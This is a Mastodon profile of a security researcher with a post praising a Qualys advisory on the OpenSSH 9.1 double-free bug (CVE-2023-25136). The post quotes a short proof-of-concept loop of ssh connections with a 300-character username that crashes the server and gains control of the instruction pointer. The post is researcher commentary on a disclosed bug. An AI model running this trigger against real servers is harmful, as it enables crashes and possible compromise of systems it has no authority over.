HD Moore

hdm@infosec.exchange

Security researcher working on #infosec, #security, #networking, #discovery, #osint, #postgresql, #aws, #engineering, #opensource, #devops, and #startup stuff. For fun I write #golang, build #IoT projects, and #run in circles.

I am the CEO and co-founder of runZero (@runZeroInc - https://runzero.com), the first step in security risk management and the best way for organizations to understand their exposure through comprehensive asset inventory.

Previously I was the founder and lead developer of Metasploit, a CSO, a consultant, and the head of various security research teams.

Pronouns are He/Him

Discovery tags: #fedi22

mastodon (AP)

HD Moore

1 year ago • •

HD Moore
1 year ago • •

This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92

Here I was thinking this bug was hopeless and they one-line it without writing new code:

$ cp -i /usr/bin/ssh ./ssh

$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh

$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done

...

#1 0x4141414141414141 in ?? ()

oss-sec: Re: double-free vulnerability in OpenSSH server 9.1 (CVE-2023-25136)

^seclists.org

⇧